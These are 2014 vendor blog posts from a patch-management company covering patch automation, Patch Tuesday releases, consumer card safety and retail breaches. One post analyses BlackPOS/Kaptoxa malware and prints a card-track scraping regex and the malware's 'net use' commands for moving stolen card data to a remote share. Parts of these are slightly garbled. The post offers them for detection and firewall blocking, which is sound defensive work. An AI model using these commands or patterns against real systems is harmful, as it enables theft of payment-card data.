PAC Helps Drive the Future of Shavlik Products

Last week, the Shavlik Product Advisory Council (PAC) met for a two-day, onsite meeting at the Shavlik office in Minneapolis.

During this event, PAC members learned more about Shavlik’s strategy and roadmap, reviewed and also test-drove Shavlik Protect 9.2, and most importantly, provided insight and guidance on Shavlik’s product direction.

Thanks to all PAC members for your participation in this event!

In the photos below, (top) PAC members discussed upcoming features in Protect 9.2; (middle) A PAC member shares his idea for an ideal security dashboard; (bottom) It wasn’t all work as PAC members and members of the Shavlik team take in a rare Twins win at Target Field.






The Communicator’s Corner: Automated Patching for Busy People

We all know by now how important it is to patch our computers to keep bad things from happening. We also know that most IT administrators are extremely busy and don’t have the time, or inclination, to devote themselves to this admittedly mundane, but critical, task. So what’s the answer? Automation.

Automation is the perfect solution for performing what would otherwise be a tedious task. Take for example the latest trend with retirement plans. Until recently, if an employee wanted to participate in the company retirement plan, they were forced to work through a mountain of paperwork on their own, and all too often people just gave up. So, many companies have decided to move away from the “opt in” approach and are instead offering automatic enrollment plans. It is human nature to take the path of least resistance, so by automating the desired path and forcing employees to manually opt out, rather than opt in, HR folks have noticed a much higher rate of participation in retirement plans. (Yea!)

The same principal holds true when it comes to implementing your patch process; it is much more likely to happen if it is automated. So is there a tool that provides automated patching and that secures your computers almost without thinking? Yes, and it is called Shavlik Protect.

How to automate your patching process using scheduled scans and deployments

The Shavlik Protect interface makes it extremely easy to set up scheduled patch scans and deployments on the machines in your organization.  Using a few basic features, (such as machine groups, scan templates, and deployment templates) you can easily configure Shavlik Protect to automatically perform recurring scheduled scans and to automatically deploy any missing patches that it detects during a scan. Doing so creates a completely automated patch scan and deployment operation.

Want to know how it is done? This screenshot probably tells you most of what you need to know.

Automated Patching for Busy People






But if you are like me, and you like to know all the details, check out our video on how to automate scheduled patching. You can find it here:

Unattended Consoles

Let’s take things one step further. First, a lead-in: If you happen to work in an organization with many office sites located across the country or around the world, you might be (you should be!) using multiple Shavlik Protect consoles. You can set things up so that the machines at a central site (probably your company headquarters) are managed by a central console, while the machines at your remote sites are managed by remote consoles. The data rollup feature can then be used so that the central console receives data about the machines being managed by the remote consoles.

With the stage now set, wouldn’t it be nice not to have to worry about any ongoing administration tasks at your remote consoles?  Well, once again, with Shavlik Protect you can! You can automate the system by implementing an unattended console at each remote site. An unattended console is a console you set up once. After that the console automatically updates its own files and manages its machines without human assistance.

Here’s how it works: The unattended console is configured to automatically perform periodic scans and to automatically deploy any patches it detects as missing on its target machines (see above). The console will also contain a patch scan template that is defined to look for a particular set of patches. The set of patches is contained in a patch list that resides on a distribution server. (Distribution servers were discussed in a previous blog article.)

Now, when new patches are released by a vendor (for example, the monthly patches released by Microsoft Corporation), you simply update the patch list on the distribution server. When the unattended console performs its next scheduled scan it will automatically reference the updated list and will patch its target machines, all without human intervention.

The following figure illustrates an unattended console configuration.

Automated Patching for Busy People 2


Rollup console


Managed machines


Unattended console


Distribution server


Patch list


Patch Management Automation: Turning a Weakness Into a Strength

PatchWithoutBorderOne of the single greatest challenges that IT professionals face today is the arduous task of keeping up with the constant bombardment of new vulnerabilities. According to the folks at NIST (the National Institute of Standards and Technology), in 2013 the total number of new vulnerabilities that were identified eclipsed 5,186.

That breaks down to 14 new vulnerabilities a day; which, without the appropriate level of patch management, makes the challenge of managing this situation almost insurmountable!  With the continuous flow of new software technology, and the constantly changing network landscape (physical, virtual and mobile…), the challenges associated with Patch Management will continue.

There is hope! The challenges associated with Patch Management will continue to persist, but by injecting the proper level of automation into mix, what was once an unmanageable issue can be easily contained. So…if you’re reading this post, and the situation I just described sounds familiar, there is a solution.

If you’re not able to keep up with the challenges associated with patch management, you should consider introducing technology that will automate this process for you, saving both time and money. Most importantly, it will help remove what today is an unknown level of risk which can provide peace of mind, and let you move on to address more pressing and important priorities. To learn more about what you can do to address the ongoing challenges associated with patch management and patch management automation, visit:

Consumers Beware: Protect Yourselves from Security Breaches

ProtectionIn this blog series on security breaches, we’ve talked a lot about what retailers can do to secure their IT infrastructures and to protect customer data. However, in today’s environment, it is impossible for any company, not to a mention a retailer, to be 100% secure. The question isn’t IF your favorite store will get hacked; the question is WHEN your favorite store will get hacked.

Given this reality, let’s turn our attention to what we as consumers can do to protect ourselves. Following three basic practices will limit your risk of exposure to nearly zero, and means you can continue blissfully shopping at all of your favorite stores, regardless of whether or not you’ve seen their name in the paper recently.

#1 – Ditch the debit cards

As I was first venturing into the adult world, one piece of financial advice my dad gave me was, “Debit cards are evil.” It was the late ‘90s, so data breaches and BlackPOS weren’t top of mind. Heck, e-commerce was just kicking off then. He was thinking about old school things like earning interest in your checking account, earning cash back from credit cards, and the risk of the card being lost or stolen.

Fast forward to today’s environment and Dad’s advice is better than ever. If a debit card number is compromised, your checking account can be emptied and your money inaccessible while you go through what can be a lengthy process of disputing the charge. With credit cards, on the other hand, you are not obligated to make payments that are under dispute, so the disputed funds stay with you. In reality your only risk from a compromised credit card number is the inconvenience of having to update auto-payments if your credit card company issues a new number. That is if you do #2…

#2 – Review your statements carefully

We as consumers do have an obligation to review our credit card statements each month and to promptly report any erroneous charges. In doing so, be especially mindful of small charges, say for like $0.05, that might be testing the viability of your card number. That type of charge is an early indicator that your credit card number has fallen into the hands of evil, so don’t let the size of the charge keep you from reporting it.

By carefully reviewing your credit card statement each month and reporting any charges that don’t seem right, you shift the responsibility for unauthorized charges from yourself to your credit card company.

#3 – Don’t stress out about the headlines

Working for a security software company, I get questioned a lot about retail security breaches by friends and family. When Target came under fire last fall, a lot of folks asked if I was going to stop shopping there and if they should stop too. The thought of not shopping at Target had never crossed my mind. Shoot, I live in Minnesota; I’d give up hockey before giving up Target.

Seriously, though, if you’ve followed the steps above, there’s little if any effect on you if your credit card info is compromised. You don’t need to stop shopping at a store because you see its name in the paper. Swipe away and leave the worry to your favorite retailer’s IT department.

If you’d like to learn more about recent security breaches, what companies can do to defend their networks, and what consumers can do protect themselves, please join us for the following Shavlik webinar.

Security Breaches Everywhere – Help your company stay out of the headlines
Thursday, October 2, 2014 10:00 am CDT
Register Now



Retailers Beware: a Swipe of the Credit Card Could Swipe your Data

176217552 In the past year, we’ve heard about numerous major retailers getting hit by a series of different variants of malware designed to swipe their customers’ credit card information.  Last week, I sat down with Anne Steiner and captured some of our thoughts on this matter. Today, I’m going to take that Q&A session we had down a level to where we discuss the technology that is causing this wave of cyber-theft.

To begin with, let’s discuss the attacks. In years past, you would typically hear about companies who leaked information from a central point. A great example is that hackers would try and infiltrate a network and then go after servers that they could tell housed critical databases that contained customer information. After taking control of that system, through whatever various means they used, they’d then use various mechanisms of exfiltration to take that data and send it offsite all in one fell swoop.

The challenge with these types of attacks is that cyber-security has advanced through the years to make this more difficult. IT Administrators first identify their “primary targets” on networks where data is stored. Then, they create various levels of security to prevent that data from being accessed from nodes that shouldn’t have access to it, while also putting IP-security around it to make sure that if the data was compromised it couldn’t freely flow off the server into the wrong hands. The quick gist, though, is it is increasingly difficult for hackers to find servers that are vulnerable and then exploit them without detection.

The challenge with the most recent wave of attacks is that the hacking community has realized that these attacks are difficult and once again the law of governing dynamics for cyber-warfare has taken over. That law specifically stating:

1)  Attacks will trend towards the most vulnerable machines on a network.

2)  Attacks will trend towards the most vulnerable software on a network.

3)  Attacks will trend towards the most valuable data on a network.

In the above, this has forced a change in the way in which hackers go about exploiting vulnerabilities and how they get data off of a network.


Fast-forward to current day where cyber security is a challenge. We have already discussed that most of your server administrators are securing servers with Patch and various levels of anti-malware detection. The challenge is that the same security perimeter does not exist at most of the user endpoints on a network. In general, most of those endpoints don’t contain highly valuable data, unless you have specific knowledge of who you are hacking. In the retail sector though, you know that there are cash-register terminals (Point of Sale systems) out there that are handling the transactions with customers and these nodes get interesting. In general, they are Microsoft Windows nodes running Point of Sale Software and they are collecting credit-cards at a rate of over 97% of consumer transactions. This is where things get interesting for hackers.

Let me give you a non-technical description of the problem for a moment. Imagine I was a thief breaking into your home. I need to target you, but realistically, I don’t know who lives there and I just kind of brute force my way in. When I get inside, I start looking around for valuable stuff to steal. Maybe I see some good stuff, but for the really valuable stuff like jewelry, credit cards, money, or even electronics, I need to dig around a bit. It takes a while, right? In the case of retail, imagine the scenario is different… I want credit cards; I know they are generally at the point of sale systems, and I know where those are located in the store. I can get in, look for exactly what I want, and then get out.

This is the power of knowing your target and what you want to steal; you can get far more specific, and that’s what is fueling all of these attacks.

We’re going to take a step back for a moment and dissect a specific malware threat known as BlackPOS or Kaptoxa. This malware is specifically designed to run on Point of Sale systems, and it is further designed in a two-step process to steal the data without detection. We’ll talk about its approach and then how to protect yourself from it.


First off, Kaptoxa has to make it onto your network. In general, the most direct approach for this to happen is an unsecure or unpatched machine, where hackers are able to gain access to your network with some sort of elevated privileges. After they get onto the network, they begin to spread Kaptoxa around via a number of freely available scripts on the internet that identify the Point-Of-Sale (POS) systems and then infect them.

After infection, Kaptoxa begins to operate with two different processes. The first process attaches itself to the POS application and begins to look for credit card information, and the latter process runs periodically and starts up to offload the captured information to external servers.

For the first process, Kaptoxa does something so simple and effective it’s scary. It grabs the POS execution process and just identifies its memory. During normal operation of the program, it’ll read some credit card information in from a credit card swipe reader.  This data is in an incredibly uniform pattern that resembles something like this:


However, this is the problem! The data is so uniform, if I can attach myself to a process and look at its memory, at some point, a credit card track will be visible to me just by scanning the memory and looking for a pattern like that. While that sounds tough, a rough scrape of that information can easily be done in a simple grep command with a parameter that looks like this:

(((%?[Bb]?)[0-9]{13,19}^[A-Za-zs]{0,26}/[A-Za-zs]{0,26}^(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9s]{3,50}?)[;s]{1,3}([0-9]{13,19}=(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9]{3,50}?))e that.

So, now that Kaptoxa knows what data it is looking for, where to find it, and how to extract it from memory, the last bit it’ll do is store it somewhere on the hard drive so it can pick it up later. In some of the early variants, it placed it right into the Windows System directory in a falsely named DLL file and just stored it in plain text.

With the main process running, Kaptoxa is constantly looking for more data to exploit and dropping it into a directory for it to be sent off later. That file will just continue to grow over time. The role of that second process is to wake up occasionally and extract the data offsite. The Kaptoxa process is again simplistic in it approach to date, using some basic mechanisms of internet file share mapping via SMB/CIFS to connect an internet drive on a remote server that is setup for open sharing, then it copies the file and removes the share. While the approach has been different by variant, the command syntax for execution will look something like:

net use L: <[X.X.X.X]>c$WINDOWStwain_32 /user:<[User]> <[Password]>

move <Windows>system32winxml.dll S:<[Machine Name]><[Day]><[Month]><[Hour]>.txt

net use L: /del

The script above connects a drive mapping called “L:” to a remote server, moves the file and then deletes the file share after it is done. A quick execution of this process later and the file is gone and your data has been extracted.


First off, I’d be remised if I didn’t remind you that the malware compromised your network through a security flaw. If the systems had been protected, it wouldn’t have been compromised in the first place. The one thing to mention here is don’t just protect your servers, but your workstations need to be patched and managed too to prevent this. At the same time, if it already happened, you want to be prepared too.

In all the variants we’ve seen so far, there are two ways to protect yourself that target a specific aspect of the malware. Let’s start with the process/memory thread. In that case, the simplest way to make sure you aren’t vulnerable is to make sure you don’t have your data on your POS hard-drive or registry. There is a very simple way to take the regular expression that I listed above, and put it into a PowerShell script that scans your windows files and finds the same signature that Kaptoxa is looking for. If you find it on your hard-drive, I promise you, if you are PCI compliant, it shouldn’t be there. You’re infected and should take immediate measures to shut down the remote nodes while you do clean-up on the malware.

The second prevention method is more of a network approach, but barring specific reasons, there shouldn’t be a reason why one of your POS systems should be attaching a network drive to an off-company IP address. To put a hard stop on this, a brute-force deny rule can be added to your firewall alerts using the general alert format of:

Block: TCP

Port: 445

From: Internal

To: External IP

If you are looking for a less-invasive rule, I’d suggest country filters for this SMB/CIFS traffic.


So, let me just say this blog isn’t just for Retail. What started as swiping swipes is proliferating into variants that haven’t been successful yet but are beginning to come together to steal banking data, financial records, health insurance/patient information and other types of structured data. We can expect this threat to evolve rapidly in 2014/2015, and everyone should implement best practices to:

1)  Prevent threats from getting on their network by protecting Servers AND WORKSTATIONS with patching and anti-malware technologies

2)  Prevent data theft from implementing more specific rules on key areas and equipment on their network to prevent data exfiltration.

If you’d like to learn more about recent security breaches, what companies can do to defend their networks, and what consumers can do protect themselves, please join us for the following Shavlik webinar.

Security Breaches Everywhere – Help your company stay out of the headlines
Thursday, October 2, 2014 10:00 am CDT
Register Now

September Patch Tuesday Round-Up

ShavlikSecurityThis month may have been a light release from Microsoft, but there was still plenty of updates to deploy. Microsoft released four security updates, one of which was critical, resolving 42 vulnerabilities. On the Non-Microsoft front, there were releases from Adobe and Google to take note of. Adobe Flash had a patch Tuesday release resulting in an IE advisory and a Google Chrome release to update the Flash plug-in. The Flash update resolved 12 vulnerabilities. There was no security updates for Office this month, but there were 18 non-security updates. One of those has run into some issues and had to be pulled. Here is a priority breakdown for security updates this month and details on known issues:

Shavlik Priority 1 Updates (Priority 1 updates should be applied as soon as possible):

  • MS14-052: Cumulative Security Update for Internet Explorer (2977629) – This update is rated as critical by Microsoft. It resolves 37 vulnerabilities which could allow for remote code execution. The updates are all relating to memory corruption issues. One of the vulnerabilities resolved (CVE-2013-7331) has been exploited in targeted attacks in the wild. There are a large number of vulnerabilities and one publicly exploited making this a high priority for update.
  • APSB14-21: Security updates available for Adobe Flash Player – This update is rated as a Priority 1 by Adobe. The update resolves 12 vulnerabilities which have a variety of impacts including memory corruptionbypass memory randomization, code execution, bypass same origin policy, and security feature bypass.
  • MSAF-029: Microsoft Security Advisory: update for vulnerabilities in Adobe Flash in Internet Explorer – This update allows Internet Explorer to support the latest Adobe Flash release which resolves 12 vulnerabilities and is rated as a Priority 1 by Adobe.
  • CHROME-111: Chrome 37.0.2062.120 – Resolves four vulnerabilities including one high priority vulnerability. The update also includes support for the latest Adobe Flash plug-in which puts it up in the priority list for this month.

Shavlik Priority 2 Updates (Priority 2 updates should be tested and rolled out in a reasonable time frame, typically within 10-30 days of release):

  • MS14-053: Vulnerability in .Net Framework could allow Denial of Service – This update resolves one privately reported vulnerability which could lead to a DoS, but by default an install of .Net will not be vulnerable to this vulnerability. The flaw is exposed if ASP.NET is installed and registered with an IIS server. This would require customer to install ASP.NET manually.
  • MS14-054: Vulnerability in Windows Task Scheduler could allow for elevation of privilege – This update resolves one privately reported vulnerability in Microsoft Windows which could allow for elevation of privilege. The attacker must, however, have a valid logon credential and be able to log on locally to exploit this vulnerability.
  • MS14-055: Vulnerabilities in Microsoft Lync Server could allow Denial of Service – This update resolves three privately reported vulnerabilities in Microsoft Lync Server. The attacker must send a specially crafted request to the Lync Server to exploit this vulnerability.

Watch List:

  • Adobe delayed release of APSB14-20 – The update will be a Priority 1 from Adobe as it resolves several critical vulnerabilities. The release was delayed to the week of September 15, meaning it will drop any day now. Once it does, you can expect to bump this up to the Priority list for rolling out this month.
  • Office non-security patch pulled by Microsoft – Microsoft did not release any security updates for Office this month, but 18 non-security updates have released.  An issue was discovered with KB2889866, an update for OneDrive, which would cause syncing to another users library to fail and moving of links etc, to no longer be picked up by sync.

For access to Shavlik’s Patch Tuesday webinar or presentation you can go to our webinars page and check out the ‘Recent Webinars’ section and click view. You can also sign up for the October Patch Tuesday webinar where we will discuss the Patch Tuesday release for all of the critical apps that affect you.

Security Breaches Everywhere: Keeping Your Company Out of the Headlines

Bunker BlogLately, it seems not a day goes by without news of a security breach dominating the headlines. The Target breach last fall set off waves of copycat attacks that still, nearly a year later, are successfully infiltrating the networks of prominent retailers. Recently, we’ve seen the likes of P.F. Chang, Dairy Queen, and Minneapolis-based SUPERVALU join the ranks of hacked retailers.

I sat down with Rob Juncker to chat about these hacks and the unique challenges that companies in certain business like retailer and health care face in securing their environments. In addition to being the Vice President of R&D here at Shavlik, Rob also dabbles in white hat hacking.


Anne:  Rob, the Target breach really got our attention as both consumers and as an industry. Now, nearly a year later, what do we know about the Target breach? How did it happen?

Rob:  We know an external hacker managed to take control and infiltrate Target’s system by way of a very unsecure node that was allowed to operate on their network. This was a complicated attack because they infiltrated a node, jumped onto Target’s network, and then had ample time to search the network, to find vulnerabilities, and to infect machines.

They infected the machines by injecting BlackPOS. It located point of sale (POS) devices, looked for specific processes on those machines, stared into their memory, and tried to match data formatted in the same manner that credit card tracks are formatted. After it found credit card data, BlackPOS sent it out of Target’s network to a location where the hackers could grab it.

Anne:  One thing that really stands out there is that they attacked a more or less forgotten node and not the data center. As an IT community, we invest so much of our energy into securing the data center, but from this example we see that isn’t enough.

Rob:  Most people focus on securing the most important assets within their network. The entire Target hack happened on the least valuable parts of the network – a computer designed for remote diagnostics as well as POS’s which are typically the cheapest nodes and the cheapest OS’s. These hackers could have never gained access to Target’s core databases, but they didn’t have to. They simply attacked the nodes where the data is collected.

Anne:  Do retailers face unique challenges in securing their IT infrastructure?

Rob:  Retailers have incredibly complex environments – all of these terminals out on a WAN in all of these stores. Nobody in IT is hands-on because every store can’t have its own IT department, and the devices are running various OS’s that have various third-party applications resident on them. This makes for a perfect storm for retailers to be exploited. Health care providers have similar complexity when you think about all of the nodes spread out throughout a hospital or a clinic.

Anne:  Here at Shavlik we are quick to share the figure that 75% of vulnerabilities exploited in the wild already have software updates (patches) available to fix them. How important is patch management in preventing these types of breaches?

Rob:  If you aren’t properly patched, someone can use off-the-shelf scripts to get access to that network. The Target hack was a professional hack. They knew what they were doing. That was the first, but all of these others are simple variants of the same approach. This has gone from being the work of an experienced hacker to that of a script kiddie. It is now readily repeatable, and we have a population of hackers attacking every site they can find.

Patch management is an important piece of having a full security profile for your entire network. Exploiting a known vulnerability is step one of the process. If you can reduce the ease of doing that, hackers are likely to move on to someone else.

Anne:  Most IT departments are disciplined about patching their data center servers with tools like Shavlik Protect and patching endpoint OS’s with tools like Microsoft System Center Configuration Manager (SCCM). Let’s assume the OS is up-to-date. Is that good enough?

Rob:  No. Because they have POS’s running a Windows OS, it is guaranteed there are third-party applications running on those devices. It could be an embedded internet browser or an embedded PDF generator. Worse, it could be Java which is the most exploited third-party application.

The existence of third-party app’s isn’t a “maybe;” it is a “for sure.” CIO’s around the world should ask themselves, “It’s great the we patch Windows, but do we patch everything else?” If the answer is “no,” are you willing to bet your job on that decision?

Anne:  Of course CIO’s don’t want to risk their jobs over something as simple as third-party app patching, but given the complexity of their networks, are IT departments for retailers faced with a lose/lose decision between knowingly remaining unsecure versus spending all of their time on patching?

Rob:  For those companies who have SCCM, Shavlik Patch for Microsoft System Center makes the decision easy. With Shavlik Patch retailers can patch third-party applications from within SCCM in the same manner in which they patch the OS. They can also completely automate the process which means they can get into a “set and forget” mode for applying third-party updates. Third-party patching doesn’t have to be a difficult or arduous process. If it feels that way, Shavlik can help you out.


Patch management is critical, but it is just one piece of the security puzzle. In the next post in this series, Rob will dig deeper into the technical details of the Target hack, discuss how you can determine if BlackPOS already exists in your environment, and explain how you can cut off its communication lines if/when it finds its way into your network.

Also, if you’d like to join a discussion on this topic, Shavlik will be hosting a webinar on September 30.

Security Breaches Everywhere – Help your company stay out of the headlines
Thursday, October 2, 2014 10:00 am CDT
Register Now

Updating Your Patch Process

ShavlikSecurityWhen is the last time your patch process was dusted off and updated? Have you accounted for virtualization, BYOD, and ShadowIT in your process? How frequently are you updating your virtual infrastructure? What is your policy around ensuring updates are applied to BYOD devices that are introduced to your environment or have access to your data? How does your policy apply to applications introduced outside of the IT department?

Things have change significantly in the past few years. The demands of the user have changed the threat landscape for IT. You now have a number of new threats and ways to be exposed that you may not have a lot of control over. So how are you dealing with these issues? Have you taken steps to update existing policies to account for software installed on devices not owned by IT? How about devices owned by IT being audited regularly to ensure software purchased outside of IT is being maintained?

If you haven’t, you are not alone. Most companies are just trying to keep up with the pace of their users and the constant changes to their environment. Many companies are still trying to mature their process to handle more than the OS and the standard Microsoft applications. Dependencies on critical applications that are sensitive to changes in software can be difficult, and will hinder the ability to move forward with a progressive policy and strategy for handling today’s threat landscape.

According to Gartner’s “Improve Patch Management” article, written last year by Ronni Colville, an organization will shift from reactive to proactive as it matures its processes.  Companies that are still reacting to critical security updates and zero day threats are likely still operating at the ‘Awareness’ or ‘Committed’ levels. Advancing to ‘Proactive’ or higher takes some effort and commitment from the entire business. Policies need to be properly documented and communicated to all teams from Security and Audit to operations and business lines or application owners. The teams all need to be committed to the process and management needs to support this commitment. The correct tools also need to be in place to support the platforms and applications in the organization. These tools should also give you the level of visibility needed to report up the organization, ensuring all parties get the proper level of visibility in the process and progress going forward.

So what is holding you back? The most common reasons I hear for a company to struggle with maturing their patch processes are:

  • Not all teams are supporting the process. In many cases one or more business lines or application owners will not allow applications to be updated that could cause them an outage. This is an obvious and very difficult issue to overcome as these are typically the business critical apps that the company relies on most.  This is also one of the reasons that Java Runtime is one of the most unpatched applications in your environment. 91 percent of web exploits involve a version of Java and the vast majority of those are versions that are outdated or have reached the end of life.
  • In some companies, the virtualization admin is outside of the operations team and not governed by the same policies. This is a common gap leaving the Virtual Infrastructure unpatched. That means the hypervisors running multiple virtual machines are potentially vulnerably and in the case of VMware, the tools on each of the VMs are out of date and potentially vulnerable.
  • Free tools like WSUS are considered ‘good enough’. Unfortunately the products that it covers fall into the 20 percent bucket for applications targeted by opportunistic hackers. With the average user being able to install their own applications, highly vulnerable products like Adobe Reader, Flash, Oracle Java, Apple iTunes, Google Chrome, and Mozilla Firefox all go unmanaged or require manual effort from the IT Ops team.  So far in 2014 Adobe has released a Priority 1 update for Flash seven of eight patch days.

I can relate one personal story. We had an expense system that unfortunately required an extremely outdated version of Internet Explorer to be able to run. Because of this requirement, we kept certain machines available with the older version in order to be able to continue using the expense system. Users would have to remote into those systems to use the expense application without issue or they would have to take manual steps to finish their expense report. We ended up switching to a SaaS based solution for many of our HR applications and the rest are slowing moving to this platform as well. It was a change that took the commitment of HR, IT, and upper management, but once completed, all parties are happier for doing it. Not only were we able to remove some very old and hard to secure systems from the environment, we made HR’s life easier as well as significantly decreasing the time and complexity of entering expenses.

Tell us more about the problems you are facing and the issues holding you back from maturing your patch process. We have heard many of the pains from our customers on how to improve their process further, but we would like to hear from you as well.

Patch Tuesday Advanced Notification September 2014

PatchWithoutBorderSo far we have four bulletins announced for September 2014, one Critical and three Important. Back in August Microsoft put a hard deadline on implementing the Update 1 (KB2919355) for Windows 8.1 and Server 2012 R2, making it so users need to install Update 1 in order to keep their systems updated.

The first patch Microsoft will be rolling out is for Internet Explorer and is Critical. For the past few months we have seen large numbers of vulnerabilities primarily around memory corruption and memory leaks being resolved in IE. It’s likely we are going to see a continuation of that trend that started back in June, but it’s probably going to be a fairly clean month for IE.

Of the three Important updates, there are two vulnerabilities that could result in a denial of service attack and one that could result in an elevation of privileges. These bulletins affect .Net Framework, the Windows Operating System and Lync Server. The .Net update is going to be the most important thing here and IT managers should make sure they are testing it adequately before rolling it out.

On the third party front, we are expecting an update from Opera any time now. They have updated their change log, but the new version (24) has not yet been made available on their downloads.

For Adobe we anticipate an update for Flash to be quite likely this month. So far in 2014 there has only been one patch Tuesday without a Flash update and that month there were two updates outside of patch Tuesday, one of which was a Zero Day. If there is a Flash release, you can expect a Microsoft Advisory update for IE to update the Flash plug-in and most likely a Google Chrome update to support the plug-in as well.

Microsoft Security Bulletins:

  • 1 bulletin is rated as Critical.
  • 3 bulletins are rated as Important

Vulnerability Impact:

  • 1 bulletin addresses vulnerabilities which could allow Remote Code Execution.
  • 2 bulletins address vulnerabilities which could result in a Denial of Service.
  • 1 bulletin addresses vulnerabilities which could allow Elevation of Privileges.

Affected Products:

  • All supported Windows Operating Systems.
  • All supported Internet Explorer versions.
  • .Net Framework.
  • Lync Server.

Join us as we review the Microsoft and third-party releases for September Patch Tuesday in our next monthly Patch Tuesday webcast, which is scheduled for Wednesday, September 10th at 11 a.m. CDT.  We will also discuss other product and patch releases since the August Patch Tuesday.

You can register for the Patch Tuesday webinar here.

Taking IP to the Cloud – Is it Time?


Keep your IT Security Garage Closed

A couple of years ago we moved from a rural community to a more active suburban area. Being closer to retail, we discovered that the area had much more traffic than our previous dwelling. Before we hardly locked the front door. Now we had to take additional security measure to protect our valuables and family.

One day, a few months after settling into our new home, the garage door was left open. We were sure we had shut it the night before, but it was definitely open the next morning. All the valuables in our cars were stolen including my work PC and travel cards, my wife’s purse, and even the “big ball of keys” that usually gets stored in the drawer but happened to be in the car’s cup holder.

After cancelling all the cards and re-keying the house, we decided to increase our security efforts for the home. With recent attacks and loss of credit card data and even very personal photos of celebrities, many are asking how can we increase our security efforts.

Like my move to a more trafficked neighborhood, many organizations are considering creating either private, public, or hybrid Clouds. With today’s security, are we ready to move our valuable data and IP into the Cloud?

Recently I attended VMworld 2014 and many of the messages coming from VMware were around moving your data and infrastructure to the Cloud. They announced a couple of initiative and products around virtualized infrastructure, rapid creation of applications, and security, all trying to build confidence for customers to move to the Cloud. Even the theme of the show was “Be brave” which I translated into “make the move”.

I’m curious how many IT organizations have plans to move their critical data and workloads into the Cloud. Do you feel this move is brave or more like leaving your garage door open? Do you feel that there are enough ways to secure your valuable data in the Cloud as you move to a place with considerably more traffic or are you cautious with recent stories of data leaving popular Cloud implementations?

The good news is we have yet to see a major online retailer such as Amazon get hit with large data loss. It looks like building secure online applications does work. But are the benefits good enough to outweigh the risks of making the move?